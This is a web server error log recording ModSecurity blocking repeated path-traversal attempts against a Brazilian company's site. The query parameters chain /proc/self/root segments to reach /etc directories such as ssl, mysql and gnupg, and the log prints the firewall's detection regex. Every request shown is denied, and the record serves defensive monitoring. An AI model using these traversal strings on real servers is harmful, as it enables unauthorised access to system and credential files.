[Tue Mar 17 11:32:50.241024 2026] [:error] [pid 9155:tid 140411733534464] [client 74.7.243.203:41376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmEtbI7zhHXcabyMUxzQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:51.559314 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:41390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmEweiSKl8TjouI-YNXgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:52.783493 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.243.203:41392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmFK4xEDsg_V3ESNY-yQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:54.079665 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.243.203:41402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmFtCmCSWTlPouqorXkQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:55.238793 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:41406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmF6BJNF7axNlVR0UIOgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:56.553049 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:41412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmGJqmL8PQht4WJFlTrwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:57.869876 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:41428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmGTarLhPAjZGI1b252wAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:59.058607 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:41436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmGweiSKl8TjouI-YNZAAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:59.472719 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.46:36966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmG6BJNF7axNlVR0UIPwAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:33:00.338489 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:48994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmHK4xEDsg_V3ESNY-ywAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:01.526744 2026] [:error] [pid 1016:tid 140411699963648] [client 74.7.243.203:49000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmHZqmL8PQht4WJFlTsgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:02.916107 2026] [:error] [pid 18709:tid 140411574073088] [client 74.7.243.203:49002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmHjarLhPAjZGI1b254AAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:06.458907 2026] [:error] [pid 9155:tid 140411658000128] [client 74.7.243.203:49008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmIdbI7zhHXcabyMUx1AAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:07.771281 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:49014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmI9CmCSWTlPouqorXlQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:08.951163 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:49016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmJAeiSKl8TjouI-YNZwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:10.257962 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.243.203:55220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmJtCmCSWTlPouqorXlgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:11.364726 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.203:55224] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmJ9Y0UrI5A3LftIzuHAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:15.409611 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.203:55228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmKweiSKl8TjouI-YNbAAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:16.711558 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:55230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmLK4xEDsg_V3ESNY-2gAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:19.097694 2026] [:error] [pid 18709:tid 140411658000128] [client 74.7.243.203:55232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmLzarLhPAjZGI1b254wAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:20.266545 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.203:55414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmMNY0UrI5A3LftIzuIQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
